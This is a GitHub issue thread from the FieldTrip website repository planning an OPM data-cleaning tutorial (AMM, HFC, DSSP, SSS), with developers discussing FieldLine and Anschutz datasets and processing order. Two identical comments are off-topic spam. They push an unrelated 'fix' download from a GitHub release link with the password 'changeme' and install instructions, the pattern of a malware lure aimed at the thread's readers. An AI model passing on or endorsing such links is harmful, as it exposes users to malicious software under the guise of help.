### ISSUE TITLE
write an OPM tutorial on software-based cleaning, amm/hfc/dssp/sss

### ISSUE THREAD

**Issue by schoffelen** [fieldtrip/website#803]
We may be able to use some data from Fieldline for this, once confirmed I will get cracking (and also use the data for a test function)

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by contsili** [comment]
I am using FieldLine OPM data for the CuttingEEGX tutorial (see #798). The plan is to share my FieldLine data in Fieldtrip's download server. Maybe you could use my data for your tutorial?

**Comment by robertoostenveld** [comment]
The cleaning needs to be done prior to appending, and AMM and SSS won't work very well on the small 32-sensor subset recordings that you have in every run.

**Comment by schoffelen** [comment]
Let's revitalize this issue, which is needed for the 2026 toolkit, as discussed.

At some point I started looking into the Flux opm dataset (which has been recorded in Birmingham), but I now also got a decent dataset (at least at first sight) from Teresa, which has been recorded in Anschutz. It is a ~130 channel (*_bz only) dataset obtained from a single subject, and contains emptyroom, VEF, AEF (+AEF oddball), gammatron, eyesopen/closed data. I have created a BIDS'ified version of these data (currently on /project/3015999.02/jansch_sandbox/opm-tutorial), but will move this to the fileserver's fieldtrip test data folder.
